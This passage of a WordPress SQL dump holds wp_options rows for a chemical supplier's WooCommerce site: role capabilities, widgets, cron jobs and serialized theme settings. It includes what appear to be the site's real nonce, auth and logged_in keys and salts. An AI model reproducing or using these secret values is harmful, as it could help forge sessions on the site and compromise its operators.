:"edit_shop_order";b:1;s:15:"read_shop_order";b:1;s:17:"delete_shop_order";b:1;s:16:"edit_shop_orders";b:1;s:23:"edit_others_shop_orders";b:1;s:19:"publish_shop_orders";b:1;s:24:"read_private_shop_orders";b:1;s:18:"delete_shop_orders";b:1;s:26:"delete_private_shop_orders";b:1;s:28:"delete_published_shop_orders";b:1;s:25:"delete_others_shop_orders";b:1;s:24:"edit_private_shop_orders";b:1;s:26:"edit_published_shop_orders";b:1;s:23:"manage_shop_order_terms";b:1;s:21:"edit_shop_order_terms";b:1;s:23:"delete_shop_order_terms";b:1;s:23:"assign_shop_order_terms";b:1;s:16:"edit_shop_coupon";b:1;s:16:"read_shop_coupon";b:1;s:18:"delete_shop_coupon";b:1;s:17:"edit_shop_coupons";b:1;s:24:"edit_others_shop_coupons";b:1;s:20:"publish_shop_coupons";b:1;s:25:"read_private_shop_coupons";b:1;s:19:"delete_shop_coupons";b:1;s:27:"delete_private_shop_coupons";b:1;s:29:"delete_published_shop_coupons";b:1;s:26:"delete_others_shop_coupons";b:1;s:25:"edit_private_shop_coupons";b:1;s:27:"edit_published_shop_coupons";b:1;s:24:"manage_shop_coupon_terms";b:1;s:22:"edit_shop_coupon_terms";b:1;s:24:"delete_shop_coupon_terms";b:1;s:24:"assign_shop_coupon_terms";b:1;s:17:"edit_shop_webhook";b:1;s:17:"read_shop_webhook";b:1;s:19:"delete_shop_webhook";b:1;s:18:"edit_shop_webhooks";b:1;s:25:"edit_others_shop_webhooks";b:1;s:21:"publish_shop_webhooks";b:1;s:26:"read_private_shop_webhooks";b:1;s:20:"delete_shop_webhooks";b:1;s:28:"delete_private_shop_webhooks";b:1;s:30:"delete_published_shop_webhooks";b:1;s:27:"delete_others_shop_webhooks";b:1;s:26:"edit_private_shop_webhooks";b:1;s:28:"edit_published_shop_webhooks";b:1;s:25:"manage_shop_webhook_terms";b:1;s:23:"edit_shop_webhook_terms";b:1;s:25:"delete_shop_webhook_terms";b:1;s:25:"assign_shop_webhook_terms";b:1;}}s:5:"agent";a:2:{s:4:"name";s:5:"Agent";s:12:"capabilities";a:3:{s:4:"read";b:1;s:14:"manage_options";b:0;s:12:"delete_posts";b:0;}}s:21:"manage_schema_options";a:2:{s:4:"name";s:21:"Manage Schema Options";s:12:"capabilities";a:30:{s:4:"read";b:1;s:10:"edit_posts";b:1;s:12:"delete_posts";b:1;s:15:"unfiltered_html";b:1;s:12:"upload_files";b:1;s:6:"export";b:1;s:6:"import";b:1;s:19:"delete_others_pages";b:1;s:19:"delete_others_posts";b:1;s:12:"delete_pages";b:1;s:20:"delete_private_pages";b:1;s:20:"delete_private_posts";b:1;s:22:"delete_published_pages";b:1;s:22:"delete_published_posts";b:1;s:17:"edit_others_pages";b:1;s:17:"edit_others_posts";b:1;s:10:"edit_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"edit_private_posts";b:1;s:20:"edit_published_pages";b:1;s:20:"edit_published_posts";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:17:"moderate_comments";b:1;s:13:"publish_pages";b:1;s:13:"publish_posts";b:1;s:18:"read_private_pages";b:1;s:18:"read_private_posts";b:1;s:16:"activate_plugins";b:1;s:14:"manage_options";b:1;}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (93, 'widget_search', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (94, 'widget_recent-posts', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (95, 'widget_recent-comments', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (96, 'widget_archives', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (97, 'widget_meta', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (98, 'sidebars_widgets', 'a:9:{s:19:"wp_inactive_widgets";a:3:{i:0;s:22:"wpadm_counter_widget-2";i:1;s:32:"woocommerce_product_categories-5";i:2;s:32:"woocommerce_product_categories-8";}s:13:"products-page";a:0:{}i:563;a:0:{}s:12:"sidebar-main";a:0:{}s:16:"sidebar-footer-1";a:1:{i:0;s:33:"woocommerce_product_categories-12";}s:16:"sidebar-footer-2";a:4:{i:0;s:13:"categories-13";i:1;s:6:"text-2";i:2;s:6:"text-3";i:3;s:10:"nav_menu-2";}s:12:"shop-sidebar";a:1:{i:0;s:33:"woocommerce_product_categories-11";}s:15:"product-sidebar";a:1:{i:0;s:33:"woocommerce_product_categories-10";}s:13:"array_version";i:3;}', 'yes'); 
INSERT INTO `wp_options` VALUES (99, 'widget_pages', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (100, 'widget_calendar', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (101, 'widget_tag_cloud', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (102, 'widget_nav_menu', 'a:2:{i:2;a:2:{s:5:"title";s:10:"Navigation";s:8:"nav_menu";i:6;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (103, 'cron', 'a:19:{i:1503417416;a:1:{s:11:"wp_cache_gc";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1503418217;a:1:{s:32:"woocommerce_cancel_unpaid_orders";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1503420519;a:1:{s:17:"quoteupDeletePdfs";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"hourly";s:4:"args";a:0:{}s:8:"interval";i:3600;}}}i:1503425880;a:1:{s:28:"woocommerce_cleanup_sessions";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1503425881;a:1:{s:30:"woocommerce_tracker_send_event";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503426273;a:1:{s:24:"jp_purge_transients_cron";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503428253;a:2:{s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1503428287;a:1:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503428290;a:1:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1503428862;a:1:{s:24:"ninja_forms_daily_action";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503429621;a:1:{s:30:"wp_scheduled_auto_draft_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503430113;a:1:{s:29:"wp_session_garbage_collection";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1503430210;a:1:{s:28:"wp_statistics_add_visit_hook";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503446400;a:2:{s:27:"woocommerce_scheduled_sales";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:19:"quoteupExpireQuotes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503451303;a:2:{s:23:"updraft_backup_database";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:14:"updraft_backup";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1503503428;a:1:{s:23:"bvdailyping_daily_event";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1504015164;a:1:{s:18:"wpseo_onpage_fetch";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"weekly";s:4:"args";a:0:{}s:8:"interval";i:604800;}}}i:1504872000;a:1:{s:25:"woocommerce_geoip_updater";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:7:"monthly";s:4:"args";a:0:{}s:8:"interval";i:2635200;}}}s:7:"version";i:2;}', 'yes'); 
INSERT INTO `wp_options` VALUES (106, 'nonce_key', 'wJPX1WVJLKoutFXDJvc8{}G_BE_5y/!]3_Q8NSR#<#-ZD<}1i[;MpiNH=]qTIuYp', 'yes'); 
INSERT INTO `wp_options` VALUES (107, 'nonce_salt', 'BrxB2I}>58Fl!YRR*_S:6sgiF:NBlMuqe~,z6Vzk)izfehv;E<TFZY-OFY(65ud4', 'yes'); 
INSERT INTO `wp_options` VALUES (115, 'auth_key', ');-4i%L/K!dGd}Utf^b6pa4T;oq.9d)PJbrH._1e|c^H(05k~a59L)W8J2Ly[>|F', 'yes'); 
INSERT INTO `wp_options` VALUES (116, 'auth_salt', ')8S&35t5|Mc-ffsEhJ-/4hywz@E~HrOJ{!i^,,KAYxTY`B0nPvMcA.m@TAmX$7gw', 'yes'); 
INSERT INTO `wp_options` VALUES (117, 'logged_in_key', '2$ZS(Thv{MgH(AgJ=MwlA&p3x7%_aIT/;l;=tY!?#!:>WK-Tl/MPAmJ8r_g/5jK*', 'yes'); 
INSERT INTO `wp_options` VALUES (118, 'logged_in_salt', '2E,|s[@pVEnus7USKn|;P>%x*+77S%JygXhZO+axM%& wpF{?Rh>* T?N560jLvc', 'yes'); 
INSERT INTO `wp_options` VALUES (143, 'theme_mods_twentysixteen', 'a:1:{s:16:"sidebars_widgets";a:2:{s:4:"time";i:1471287987;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:6:{i:0;s:8:"search-2";i:1;s:14:"recent-posts-2";i:2;s:17:"recent-comments-2";i:3;s:10:"archives-2";i:4;s:12:"categories-2";i:5;s:6:"meta-2";}}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (144, 'current_theme', 'Flatsome', 'yes'); 
INSERT INTO `wp_options` VALUES (145, 'theme_mods_flatsome', 'a:191:{i:0;b:0;s:12:"social_icons";a:7:{s:8:"facebook";b:1;s:7:"twitter";b:1;s:5:"email";b:1;s:9:"pinterest";b:1;s:10:"googleplus";b:1;s:8:"whatsapp";b:1;s:6:"tumblr";b:1;}s:7:"backups";N;s:9:"smof_init";s:31:"Mon, 15 Aug 2016 19:06:31 +0000";s:17:"minified_flatsome";i:0;s:16:"flatsome_builder";i:1;s:14:"google_map_api";s:0:"";s:16:"maintenance_mode";i:0;s:21:"maintenance_mode_text";s:24:"Please check back soon..";s:19:"html_scripts_header";s:0:"";s:19:"html_scripts_footer";s:0:"";s:15:"html_custom_css";s:492:"@media screen and (min-width: 800px)\n {\n.box-text-products a {font-size: 125%;\n color:#1E73BE;}\n}\nul {\n    list-style-type: square;\n    font-size: initial;\n    margin: 30px;\n}\nli {\n    list-style-type: square;\n    font-size: smaller;\n    font-weight:normal; \n}\n/*To remove Sorting drop down */\n.orderby {\ndisplay: none !important;\n}\n\n.search-name {\n   color: black !important;\n}\n.cat-item a href {\nborder-style: solid;\nborder-color: black;\n}\n\np.product-title  {\nfont-size: large !important;\n}";s:22:"html_custom_css_mobile";s:0:"";s:9:"site_logo";s:48:"[site_url]/wp-content/uploads/2016/08/logo-4.png";s:0:"";s:165:"Favicon upload has moved to: <br/> <a href=\'[site_url]/wp-admin/customize.php?&autofocus%5Bpanel%5Dof-option-logoandicons\'>Appearance > Customize > Site Identity</a>";s:16:"custom_cart_icon";s:0:"";s:14:"site_logo_dark";s:0:"";s:16:"site_logo_sticky";s:0:"";s:11:"body_layout";s:10:"full-width";s:10:"box_shadow";s:1:"1";s:7:"body_bg";s:7:"#FFFFFF";s:13:"body_bg_image";s:0:"";s:12:"body_bg_type";s:0:"";s:13:"content_color";s:5:"light";s:10:"content_bg";s:4:"#FFF";s:13:"header_preset";s:0:"";s:13:"header_height";s:3:"110";s:10:"logo_width";s:3:"210";s:13:"logo_position";s:4:"left";s:10:"search_pos";s:4:"left";s:12:"nav_position";s:3:"top";s:8:"nav_size";s:5:"large";s:18:"myaccount_dropdown";i:1;s:19:"account_login_style";s:4:"link";s:9:"show_cart";i:1;s:14:"top_right_text";s:21:"CALL US: 203-743-4447";s:13:"header_sticky";i:1;s:20:"header_height_sticky";s:2:"70";s:12:"header_color";s:5:"light";s:9:"header_bg";s:4:"#fff";s:13:"header_bg_img";s:0:"";s:17:"header_bg_img_pos";s:8:"repeat-x";s:11:"topbar_show";i:1;s:9:"topbar_bg";s:0:"";s:11:"topbar_left";s:46:"PROVIDING CHEMICAL SOLUTIONS FOR OVER 60 YEARS";s:12:"topbar_right";s:0:"";s:15:"nav_position_bg";s:4:"#eee";s:18:"nav_position_color";s:5:"light";s:17:"nav_position_text";s:26:"Add shortcode or text here";s:21:"nav_position_text_top";s:26:"Add shortcode or text here";s:17:"html_after_header";s:0:"";s:10:"html_intro";s:0:"";s:16:"footer_left_text";s:75:"Copyright [ux_current_year] &copy; <strong>Miller-Stephenson, Inc.</strong>";s:17:"footer_right_text";s:51:"<a href=/terms-conditions/>Terms and Conditions</a>";s:14:"footer_1_color";s:5:"light";s:17:"footer_1_bg_color";s:7:"#1E73BE";s:17:"footer_1_bg_image";s:0:"";s:16:"footer_1_columns";s:1:"4";s:14:"footer_2_color";s:4:"dark";s:17:"footer_2_bg_color";s:7:"#093D6A";s:17:"footer_2_bg_image";s:0:"";s:16:"footer_2_columns";s:1:"4";s:19:"footer_bottom_style";s:4:"dark";s:19:"footer_bottom_color";s:4:"#333";s:18:"html_before_footer";s:0:"";s:17:"html_after_footer";s:0:"";s:13:"disable_fonts";s:1:"0";s:13:"type_headings";a:6:{i:0;s:1:"L";i:1;s:1:"a";i:2;s:1:"t";i:3;s:1:"o";s:11:"font-family";s:6:"Oswald";s:7:"variant";s:3:"700";}s:10:"type_texts";a:6:{i:0;s:1:"L";i:1;s:1:"a";i:2;s:1:"t";i:3;s:1:"o";s:11:"font-family";s:47:"Georgia,Times,&quot;Times New Roman&quot;,serif";s:7:"variant";s:7:"regular";}s:8:"type_nav";a:6:{i:0;s:1:"L";i:1;s:1:"a";i:2;s:1:"t";i:3;s:1:"o";s:11:"font-family";s:6:"Oswald";s:7:"variant";s:3:"700";}s:8:"type_alt";a:16:{i:0;s:1:"D";i:1;s:1:"a";i:2;s:1:"n";i:3;s:1:"c";i:4;s:1:"i";i:5;s:1:"n";i:6;s:1:"g";i:7;s:1:" ";i:8;s:1:"S";i:9;s:1:"c";i:10;s:1:"r";i:11;s:1:"i";i:12;s:1:"p";i:13;s:1:"t";s:11:"font-family";s:26:"Helvetica,Arial,sans-serif";s:7:"variant";s:3:"700";}s:11:"type_subset";a:1:{s:5:"latin";b:1;}s:11:"custom_font";s:0:"";s:13:"color_primary";s:7:"#1E73BE";s:15:"color_secondary";s:7:"#d26e4b";s:13:"color_success";s:7:"#7a9c59";s:11:"color_links";s:7:"#4E657B";s:13:"button_radius";s:3:"0px";s:15:"dropdown_border";s:0:"";s:11:"dropdown_bg";s:0:"";s:13:"dropdown_text";s:5:"light";s:11:"blog_layout";s:13:"right-sidebar";s:10:"blog_style";s:11:"blog-normal";s:18:"blog_archive_title";i:1;s:11:"blog_header";s:1:" ";s:15:"blog_after_post";s:1:" ";s:16:"blog_post_layout";s:13:"right-sidebar";s:15:"blog_post_style";s:7:"default";s:15:"blog_author_box";i:1;s:10:"blog_share";i:0;s:13:"blog_parallax";i:0;s:19:"featured_items_page";i:0;s:22:"featured_items_pr_page";s:2:"12";s:22:"featured_items_related";s:1:"2";s:29:"featured_items_related_height";s:5:"250px";s:16:"wc_account_links";i:1;s:14:"facebook_login";i:0;s:17:"facebook_login_bg";s:0:"";s:18:"nav_menu_locations";a:3:{s:7:"primary";i:6;s:14:"primary_mobile";i:6;s:11:"top_bar_nav";i:7;}s:20:"topbar_elements_left";a:1:{i:0;s:4:"html";}s:21:"topbar_elements_right";a:3:{i:0;s:6:"social";i:1;s:7:"account";i:2;s:6:"html-3";}s:20:"header_elements_left";a:1:{i:0;s:3:"nav";}s:21:"header_elements_right";a:1:{i:0;s:6:"search";}s:27:"header_elements_bottom_left";a:0:{}s:29:"header_elements_bottom_center";a:0:{}s:28:"header_elements_bottom_right";a:0:{}s:27:"header_mobile_elements_left";a:1:{i:0;s:9:"menu-icon";}s:28:"header_mobile_elements_right";a:1:{i:0;s:7:"account";}s:26:"header_mobile_elements_top";a:0:{}s:14:"mobile_sidebar";a:7:{i:0;s:11:"search-form";i:1;s:3:"nav";i:2;s:7:"divider";i:3;s:7:"nav-top";i:4;s:7:"account";i:5;s:6:"html-2";i:6;s:6:"html-3";}s:14:"product_layout";s:10:"no-sidebar";s:14:"follow_twitter";s:31:"https://twitter.com/MSChemicals";s:15:"follow_facebook";s:72:"https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/";s:16:"follow_instagram";s:0:"";s:12:"follow_email";s:0:"";s:16:"flatsome_version";i:3;s:22:"html_custom_css_tablet";s:0:"";s:21:"lazy_load_backgrounds";s:1:"1";s:16:"lazy_load_images";s:1:"0";s:21:"maintenance_mode_page";s:1:"0";s:12:"catalog_mode";s:1:"1";s:19:"catalog_mode_prices";s:1:"1";s:19:"catalog_mode_header";s:0:"";s:20:"catalog_mode_product";s:0:"";s:21:"catalog_mode_lightbox";s:0:"";s:12:"product_zoom";s:1:"1";s:19:"category_grid_style";s:4:"list";s:25:"short_description_in_grid";s:1:"1";s:20:"category_title_style";s:15:"featured-center";s:19:"category_show_title";s:1:"1";s:20:"product_box_category";s:1:"1";s:18:"product_box_rating";s:1:"0";s:16:"category_sidebar";s:12:"left-sidebar";s:18:"category_row_count";s:1:"5";s:25:"category_row_count_tablet";s:1:"2";s:25:"category_row_count_mobile";s:1:"2";s:15:"breadcrumb_size";s:5:"small";s:9:"cat_style";s:6:"bounce";s:15:"category_shadow";s:1:"3";s:21:"category_shadow_hover";s:1:"3";s:10:"grid_style";s:5:"grid1";s:18:"cart_dropdown_show";s:1:"0";s:14:"product_upsell";s:8:"disabled";s:16:"related_products";s:6:"hidden";s:15:"product_display";s:11:"tabs_normal";s:16:"add_to_cart_icon";s:6:"button";s:27:"category_header_transparent";s:1:"0";s:20:"header_shop_bg_color";s:21:"rgba(30,115,190,0.86)";s:17:"header_top_height";s:2:"38";s:8:"footer_2";s:1:"1";s:18:"footer_bottom_text";s:4:"dark";s:8:"footer_1";s:1:"0";s:11:"back_to_top";s:1:"1";s:13:"payment_icons";a:0:{}s:17:"flatsome_lightbox";s:1:"1";s:17:"search_icon_style";s:10:"fill-round";s:19:"header_search_width";s:2:"62";s:24:"header_search_form_style";s:0:"";s:13:"search_result";s:1:"0";s:19:"header_search_style";s:8:"lightbox";s:24:"header_search_categories";s:1:"0";s:23:"header_account_register";s:1:"1";s:18:"account_icon_style";s:4:"fill";s:13:"contact_phone";s:12:"800-736-5216";s:13:"contact_email";s:18:"support@mschem.com";s:19:"contact_email_label";s:8:"EMAIL US";s:16:"contact_location";s:3:"USA";s:13:"follow_google";s:45:"https://plus.google.com/105252144916647489581";s:15:"follow_linkedin";s:67:"https://www.linkedin.com/company/miller-stephenson-chemical-company";s:14:"follow_youtube";s:56:"https://www.youtube.com/channel/UCIzL6IjTcA9LyXOoOpdIJ3w";s:17:"product_info_meta";s:1:"1";s:18:"product_info_share";s:1:"1";s:18:"color_widget_links";s:0:"";s:24:"color_widget_links_hover";s:0:"";s:11:"color_texts";s:7:"#777777";s:19:"type_headings_color";s:7:"#555555";s:17:"color_links_hover";s:7:"#111111";s:14:"color_checkout";s:0:"";s:10:"color_sale";s:0:"";s:16:"color_new_bubble";s:0:"";s:12:"color_review";s:0:"";s:20:"flatsome_lightbox_bg";s:7:"#444444";s:13:"nav_style_top";s:7:"divided";s:14:"dropdown_style";s:4:"bold";s:19:"dropdown_text_style";s:9:"uppercase";s:12:"header_width";s:9:"container";s:9:"nav_style";s:0:"";s:27:"header_bg_transparent_shade";s:1:"0";s:17:"box_shadow_header";s:1:"1";s:14:"header_divider";s:1:"1";s:10:"nav_height";s:2:"30";}', 'yes'); 
INSERT INTO `wp_options` VALUES (146, 'theme_switched', '', 'yes'); 
INSERT INTO `wp_options` VALUES (147, 'widget_flatsome_recent_posts', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (148, 'theme_mods_flatsome-child', 'a:150:{i:0;b:0;s:12:"social_icons";a:9:{s:8:"facebook";s:1:"1";s:7:"twitter";s:1:"1";s:5:"email";s:1:"1";s:9:"pinterest";s:1:"1";s:10:"googleplus";s:1:"1";s:6:"tumblr";s:1:"1";s:8:"whatsapp";s:1:"1";s:8:"linkedin";s:1:"0";s:2:"vk";s:1:"0";}s:7:"backups";a:149:{i:0;b:0;s:12:"social_icons";a:9:{s:8:"facebook";s:1:"1";s:7:"twitter";s:1:"1";s:5:"email";s:1:"1";s:9:"pinterest";s:1:"1";s:10:"googleplus";s:1:"1";s:6:"tumblr";s:1:"1";s:8:"whatsapp";s:1:"1";s:8:"linkedin";s:1:"0";s:2:"vk";s:1:"0";}s:7:"backups";a:149:{i:0;b:0;s:12:"social_icons";a:9:{s:8:"facebook";s:1:"1";s:7:"twitter";s:1:"1";s:5:"email";s:1:"1";s:9:"pinterest";s:1:"1";s:10:"googleplus";s:1:"1";s:6:"tumblr";s:1:"1";s:8:"whatsapp";s:1:"1";s:8:"linkedin";s:1:"0";s:2:"vk";s:1:"0";}s:7:"backups";a:149:{i:0;b:0;s:12:"social_icons";a:9:{s:8:"facebook";s:1:"1";s:7:"twitter";s:1:"1";s:5:"email";s:1:"1";s:9:"pinterest";s:1:"1";s:10:"googleplus";s:1:"1";s:6:"tumblr";s:1:"1";s:8:"whatsapp";s:1:"1";s:8:"linkedin";s:1:"0";s:2:"vk";s:1:"0";}s:7:"backups";N;s:17:"minified_flatsome";i:0;s:16:"flatsome_builder";i:1;s:14:"google_map_api";s:0:"";s:16:"maintenance_mode";i:0;s:21:"maintenance_mode_text";s:24:"Please check back soon..";s:19:"html_scripts_header";s:0:"";s:19:"html_scripts_footer";s:0:"";s:15:"html_custom_css";s:6:"div {}";s:22:"html_custom_css_mobile";s:0:"";s:9:"site_logo";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/mslogo-1-e1471289515793.png";s:0:"";s:188:"Favicon upload has moved to: <br/> <a href=\'https://www.miller-stephenson.com/wp-admin/customize.php?&autofocus%5Bpanel%5Dof-option-logoandicons\'>Appearance > Customize > Site Identity</a>";s:16:"custom_cart_icon";s:0:"";s:14:"site_logo_dark";s:0:"";s:16:"site_logo_sticky";s:0:"";s:11:"body_layout";s:10:"full-width";s:10:"box_shadow";i:0;s:7:"body_bg";s:0:"";s:13:"body_bg_image";s:0:"";s:12:"body_bg_type";s:12:"bg-full-size";s:13:"content_color";s:4:"dark";s:10:"content_bg";s:4:"#FFF";s:13:"header_preset";s:0:"";s:13:"header_height";s:3:"100";s:10:"logo_width";s:3:"234";s:13:"logo_position";s:4:"left";s:10:"search_pos";s:4:"left";s:12:"nav_position";s:3:"top";s:8:"nav_size";s:3:"80%";s:18:"myaccount_dropdown";s:1:"0";s:19:"account_login_style";s:4:"link";s:9:"show_cart";s:1:"0";s:14:"top_right_text";s:74:"[follow facebook=\'#\'\' twitter=\'#\' instagram=\'#\'  googleplus=\'#\' email=\'#\']";s:13:"header_sticky";i:1;s:20:"header_height_sticky";s:2:"70";s:12:"header_color";s:5:"light";s:9:"header_bg";s:5:"#ffff";s:13:"header_bg_img";s:0:"";s:17:"header_bg_img_pos";s:8:"repeat-x";s:11:"topbar_show";i:1;s:9:"topbar_bg";s:0:"";s:11:"topbar_left";s:42:"Add anything here here or just remove it..";s:12:"topbar_right";s:0:"";s:15:"nav_position_bg";s:7:"#0a0a0a";s:18:"nav_position_color";s:11:"dark-header";s:17:"nav_position_text";s:0:"";s:21:"nav_position_text_top";s:0:"";s:17:"html_after_header";s:0:"";s:10:"html_intro";s:0:"";s:16:"footer_left_text";s:71:"Copyright [ux_current_year] © <strong>Miller-Stephenson, Inc.</strong>";s:17:"footer_right_text";s:0:"";s:14:"footer_1_color";s:5:"light";s:17:"footer_1_bg_color";s:4:"#fff";s:17:"footer_1_bg_image";s:0:"";s:16:"footer_1_columns";s:7:"large-3";s:14:"footer_2_color";s:4:"dark";s:17:"footer_2_bg_color";s:4:"#777";s:17:"footer_2_bg_image";s:0:"";s:16:"footer_2_columns";s:7:"large-3";s:19:"footer_bottom_style";s:4:"dark";s:19:"footer_bottom_color";s:4:"#333";s:18:"html_before_footer";s:0:"";s:17:"html_after_footer";s:0:"";s:13:"disable_fonts";i:0;s:13:"type_headings";s:4:"Lato";s:10:"type_texts";s:4:"Lato";s:8:"type_nav";s:4:"Lato";s:8:"type_alt";s:14:"Dancing Script";s:11:"type_subset";a:7:{s:5:"latin";s:1:"1";s:12:"cyrillic-ext";s:1:"0";s:9:"greek-ext";s:1:"0";s:5:"greek";s:1:"0";s:10:"vietnamese";s:1:"0";s:9:"latin-ext";s:1:"0";s:8:"cyrillic";s:1:"0";}s:11:"custom_font";s:0:"";s:13:"color_primary";s:7:"#009bdb";s:15:"color_secondary";s:7:"#d26e4b";s:13:"color_success";s:7:"#7a9c59";s:11:"color_links";s:0:"";s:13:"button_radius";s:3:"0px";s:15:"dropdown_border";s:0:"";s:11:"dropdown_bg";s:0:"";s:13:"dropdown_text";s:5:"light";s:11:"blog_layout";s:13:"right-sidebar";s:10:"blog_style";s:11:"blog-normal";s:18:"blog_archive_title";i:1;s:11:"blog_header";s:1:" ";s:15:"blog_after_post";s:1:" ";s:16:"blog_post_layout";s:13:"right-sidebar";s:15:"blog_post_style";s:7:"default";s:15:"blog_author_box";i:1;s:10:"blog_share";i:0;s:13:"blog_parallax";i:0;s:19:"featured_items_page";i:0;s:22:"featured_items_pr_page";s:2:"12";s:22:"featured_items_related";s:7:"default";s:29:"featured_items_related_height";s:5:"250px";s:16:"wc_account_links";i:1;s:14:"facebook_login";i:0;s:17:"facebook_login_bg";s:0:"";s:14:"color_checkout";s:0:"";s:10:"color_sale";s:0:"";s:16:"color_new_bubble";s:7:"#7a9c59";s:12:"color_review";s:0:"";s:15:"product_sidebar";s:10:"no_sidebar";s:25:"product_offcanvas_sidebar";s:1:"0";s:15:"product_display";s:4:"tabs";s:18:"cart_dropdown_show";s:1:"1";s:16:"shop_aside_title";s:17:"complete the look";s:12:"product_zoom";s:1:"0";s:16:"related_products";s:6:"slider";s:23:"related_products_pr_row";s:1:"4";s:20:"max_related_products";s:2:"12";s:15:"disable_reviews";s:1:"0";s:9:"tab_title";s:0:"";s:11:"tab_content";s:0:"";s:23:"html_before_add_to_cart";s:1:" ";s:22:"html_after_add_to_cart";s:0:"";s:14:"html_shop_page";s:0:"";s:16:"category_sidebar";s:12:"left-sidebar";s:10:"grid_style";s:5:"grid1";s:10:"grid_frame";s:6:"normal";s:12:"masonry_grid";s:1:"0";s:16:"add_to_cart_icon";s:7:"disable";s:25:"short_description_in_grid";s:1:"0";s:9:"cat_style";s:10:"text-badge";s:15:"breadcrumb_size";s:17:"breadcrumb-normal";s:15:"breadcrumb_home";s:1:"1";s:18:"category_row_count";s:1:"3";s:25:"category_row_count_mobile";s:1:"2";s:16:"products_pr_page";s:2:"12";s:13:"search_result";s:1:"0";s:13:"product_hover";s:12:"fade_in_back";s:12:"bubble_style";s:6:"style1";s:22:"sale_bubble_percentage";s:1:"0";s:18:"disable_quick_view";s:1:"0";s:13:"wishlist_icon";s:5:"heart";s:15:"coupon_checkout";s:1:"0";s:17:"continue_shopping";s:1:"0";s:16:"html_cart_footer";s:0:"";s:21:"html_checkout_sidebar";s:0:"";s:14:"html_thank_you";s:0:"";s:12:"catalog_mode";s:1:"1";s:19:"catalog_mode_prices";s:1:"1";s:19:"catalog_mode_header";s:0:"";s:20:"catalog_mode_product";s:0:"";s:21:"catalog_mode_lightbox";s:0:"";s:19:"facebook_login_text";s:0:"";s:23:"facebook_login_checkout";s:1:"0";s:18:"custom_share_icons";s:0:"";s:18:"nav_menu_locations";a:3:{s:7:"primary";i:6;s:14:"primary_mobile";i:6;